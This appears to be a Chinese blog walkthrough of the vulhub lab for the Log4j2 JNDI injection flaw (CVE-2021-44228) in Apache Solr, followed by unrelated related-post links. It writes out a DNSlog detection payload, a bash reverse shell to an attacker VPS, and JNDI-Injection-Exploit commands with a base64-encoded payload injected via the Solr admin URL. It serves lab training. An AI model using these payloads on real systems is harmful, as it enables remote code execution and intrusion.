Log4j2漏洞vul-hub通关教程

启动环境:

1.首先我们来到我们的来到靶场这里博主是在自己的vps上面docker上面搭接的vul-hub启动环境输入我们的命令:

cd vulhub/log4j/CVE-2021-44228

docker-compose up -d显示这样就代表成功启动了。
2.然后我们输入我们vps的IP地址然后加上给的端口去浏览器访问,看到成功访问到了。

检查漏洞是否存在:

3.然后我们来验证漏洞,我们需要准备一个DNSlog平台来验证是否存在漏洞,

4.然后将上面dnslong给的后缀添加到这条命令末尾:/solr/admin/cores?action={jndi:ldap://{sys:java.version}.0jhatp.dnslog.cn},然后拼接在原网站后面去访问。

5.去dnslog平台点击一下刷新就可以看到带出来的信息了。说明存在漏洞!!!

漏洞利用:

6.然后我们直接新建一个主机,并且监听端口

下载安装JDNI:

项目地址:https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0

反弹shell

7.然后将我们反弹shell的命令经过bae64编码后填入我们的代码模板执行。

反弹shell命令:bash -i >& /dev/tcp/自己的vpsIP/端口 0>&1

命令模板:
java -jar target/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c
{echo,[经过base64编码后的命令]}|{base64,-d}|bash" -A [你的vpsip]

执行后:

8.然后将生成的恶意代码类插入命令模板后面。命令模板:/solr/admin/cores?action=${jndi:填充}

9.然后将命令拼接在url后面访问即可

10.连接成功后去我们监听的那个机器就可以执行命令了。

相关推荐
zero13_小葵司2 天前
基于Springboot的DDD实战(不依赖框架)
java·spring boot·log4j
加菲猫8604 天前
Apache Log4j2 lookup JNDI 注入漏洞(CVE-2021-44228)
log4j·apache
蛋黄液6 天前
【黑马程序员】后端Web基础--Maven基础和基础知识
前端·log4j·maven
神仙别闹7 天前
基于ASP.NET+SQL Server简单的 MVC 电商网站
log4j·asp.net·mvc
Mr_Xuhhh20 天前
项目需求分析(2)
c++·算法·leetcode·log4j
山楂树下懒猴子21 天前
ChatAI项目-ChatGPT-SDK组件工程
人工智能·chatgpt·junit·https·log4j·intellij-idea·mybatis
Mr_Xuhhh21 天前
gtest全局套件的测试使用
log4j
索迪迈科技21 天前
Protobuf 新版“调试表示为什么有链接?为什么会打码?我该怎么改代码?
java·log4j·apache
凯子坚持 c22 天前
Redis核心通用命令深度解析:结合C++ redis-plus-plus 实战指南
c++·redis·log4j